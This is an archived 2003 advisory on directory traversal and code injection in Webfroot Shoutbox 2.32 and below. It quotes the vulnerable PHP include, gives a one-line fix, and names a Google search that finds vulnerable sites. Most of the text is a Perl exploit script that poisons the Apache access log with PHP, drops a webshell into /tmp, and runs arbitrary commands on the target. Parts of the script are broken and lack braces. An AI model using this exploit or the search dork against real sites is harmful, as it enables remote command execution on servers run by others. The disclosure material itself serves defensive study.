TUCoPS :: Web :: PHP :: bt313.txt

Webfroot Shoutbox 2.32 directory traversal and code injection.

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Products: Webfroot Shoutbox v 2.32 and below (http://shoutbox.sf.net)
Date: 09 May 2003
Author:  pokleyzz <pokleyzz_at_scan-associates.net>
Contributors:	sk_at_scan-associates.net 
URL: http://www.scan-associates.net

Summary: Webfroot Shoutbox 2.32 and below directory traversal and code injection.

Webfroot Shoutbox is PHP script released under the GPL. Also known as a tagboard 
or a blabbox, shoutboxes allow visitors to your website to leave messages to 
other visitors quickly and easily.

User can view any readable file on system where webfroot shoutbox is running using
$conf variable.

i) Shoutbox v2.32

shoutbox.php line 43
if (!isset($conf)) {
} else {
   # michel v was there 
   $conf = str_replace(':', '', $conf); // hi cross-site scripting, bye cross-site scripting
   $conf = str_replace('%3a', '', $conf); // hi cross-site scripting, bye cross-site scripting

require_once ($conf);

ii) Shoutbox v2.31

shoutbox.php line 43
if (!isset($conf)) {

require_once ($conf);

Proof of concept

a) View any readable file

b) Remote command execution
	i)  for version 2.31 user can remotely include file.
	ii) version 2.32 user can use apache access_log to include php code
		[see attachment]

Append to line 48 of shoutbox.php
	$conf = str_replace('./', '', $conf); // to avoid directory traversal

Search for ":: Shoutbox" at www.google.com can easily identify vulnerable site (129,000 result)

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# Webfroot Shoutbox < 2.32 on apache exploit
# by pokleyzz of d'scan clanz
# Greet: 
#	tynon, sk ,wanvadder,  flyguy, sutan ,spoonfork, tenukboncit, kerengge_kurus , 
#	s0cket370 , b0iler and d'scan clan.
# Shout  to:
#	 #vuln , #mybsd , #mylinux 
# Just for fun :). Weekend stuff ..

use IO::Socket;

my $host = "";
my $port = 80;
my $shoutbox = "shoutbox.php?conf=";
my $shoutboxpath = "/shoutbox";
my $cmd = "ls -l";
my $conn;
my $type;
my @logs = (	
		#"D:/apps/Apache Group/Apache2/logs/access.log"	
my $qinit = "GET /<?\$h=fopen('/tmp/.ex','w+');fwrite(\$h,'Result:<pre><?system(\$cmd);?></pre>');fclose(\$h);?> HTTP/1.1\nHost:\nConnection: Close\n\n";
my $conn;

if ($ARGV[0] eq "x" || $ARGV[0] eq "r"){
	$type = $ARGV[0];	
else {
	print "[x] Webfroot Shoutbox < 2.32 on apache exploit \n\tby pokleyzz of d' scan clan\n\n";
	print "Usage: \n jeritan_batinku.pl (x|r) host [command] [path] [port]\n";
	print "\ttype\tx = exploit | r = run command (after run with x option)\n";
	print "\thost\thostname\n";
	print "\tcommand\tcommand to execute on remote server\n";
	print "\tpath\tpath to shoutbox installation ex: /shoutbox\n";
	print "\tport\tport number\n";

if ($ARGV[1]){
	$host = $ARGV[1];	

if ($ARGV[2]){
	$cmd = $ARGV[2];	
if ($ARGV[3]){
	$shoutboxpath = $ARGV[3];	
if ($ARGV[4]){
	$port = int($ARGV[4]);	

$cmd =~ s/ /+/g;

sub connect_to {
	#print "[x] Connect to $host on port $port ...\n";
	$conn = IO::Socket::INET->new (
					Proto => "tcp",
					PeerAddr => "$host",
					PeerPort => "$port",
					) or die "[*] Can't connect to $host on port $port ...\n";
	$conn-> autoflush(1);

sub connect_end {
	#print "[x] Close connection\n";

sub exploit {
	my $access_log = $_[0];
	my $result = "";
	$access_log =~ s/ /+/g;
	my $query = "GET ${shoutboxpath}/${shoutbox}${access_log} HTTP/1.1\nHost: $host\nConnection: Close\n\n";
	print "$query";
	print "[x] Access log : ", $access_log ,"\n";
	print $conn $query;
	while ($line = <$conn>) { 
		$result = $line;
		#print $result;

sub run_cmd {
	my $conf="/tmp/.ex";
	#my $conf="d:/tmp/.ex";
	my $result = "";
	my $query = "GET ${shoutboxpath}/${shoutbox}${conf}&cmd=$cmd HTTP/1.1\nHost: $host\nConnection: Close\n\n";
	print "[x] Run command ...\n";
	print $conn $query;
	while ($line = <$conn>) { 
		$result .= $line;
	if ($result =~ /Result:/){
		print $result;
	} else {
		print $result;
		print "[*] Failed ...";


sub insert_code {
	my $result = "";
	print "[x] Access log : ", $access_log ,"\n";
	print "[x] Insert php code into apache access log ...\n";
	print $conn "$qinit";
	while ($line = <$conn>) { 
		$result .= $line;
	print $result;	

if ($type eq "x"){
	print "[x] Trying to exploit ...\n";
	for ($i = 0;$i <= $#logs; $i++){
} else {


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